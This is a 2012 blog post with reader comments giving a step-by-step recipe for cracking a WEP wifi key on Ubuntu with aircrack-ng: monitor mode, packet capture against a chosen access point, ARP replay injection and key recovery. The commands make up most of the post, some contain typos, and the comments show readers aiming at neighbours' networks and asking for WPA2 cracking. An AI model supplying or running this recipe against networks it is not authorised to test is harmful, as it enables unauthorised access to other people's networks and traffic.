Monday, December 3, 2012

How to crack wi-fi password in ubuntu?


For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
(1)install aircrack
sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “sudo su -“ and type your password.

(3)now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code:
# airodump-ng wlan0 
crack-wi-fi-password-in-ubuntu


(5)Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.
Code:
# airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0 
crack-wi-fi-password-in-ubuntu

(6)Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.
Code:
# aireplay-ng -3 –b 00:15:EB:E7: … wlan0 
crack-wi-fi-password-in-ubuntu

(7)Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
Code:
# aircrack-ng wep-03.cap 
crack-wi-fi-password-in-ubuntu

Then you should see that the key has been decrypted 100% successfully and the key itself.

17 comments:

Unknown said...

I cracked a wep, but not able to crack WPA2-psk

Unknown said...

cau you help in cracking WPA2-PSK

Mehul Singh said...

I am getting this message on writing the command #iwconfig wlan0 mode monitoring

SET failed on device wlan0 ; Device or resource busy.

Ajnas Maprom said...

when i type password it is showing that
"su: Authentication failure"

Ajnas Maprom said...

when i type password of mine it is showing that
"su: Authentication failure"

booriz lukac said...

aircrack-ng wep-01.cap
Please specify a dictionary (option -w).
(?)

Arnab said...

@Ajnas Maprom

Try sudo -i

Arnab said...

try,

sudo -i

Unknown said...

@Ajnas Maprom




I had the same issue just type sudo first.

Unknown said...

just type sudo instead

Unknown said...

@Ajnas Maprom




I had the same issue just type sudo first.

Unknown said...

when i run the command iwconfig, what i get is "lo no wirless extension"

Unknown said...

bro type sudo su -
then type your root password

Unknown said...

after decryption, what is the password?

Unknown said...

Could you help me, how to hack WPA2-PSK

Jenny.blog said...

After i type the sudo apt-get install aircrak-ng it shows that could not get lock /var/dpkg/lock....
Unable to lock administration directory pls help

Unknown said...

I want to hack my nearby wifi but it show that no wireless extension

Post a Comment

UA-35960349-1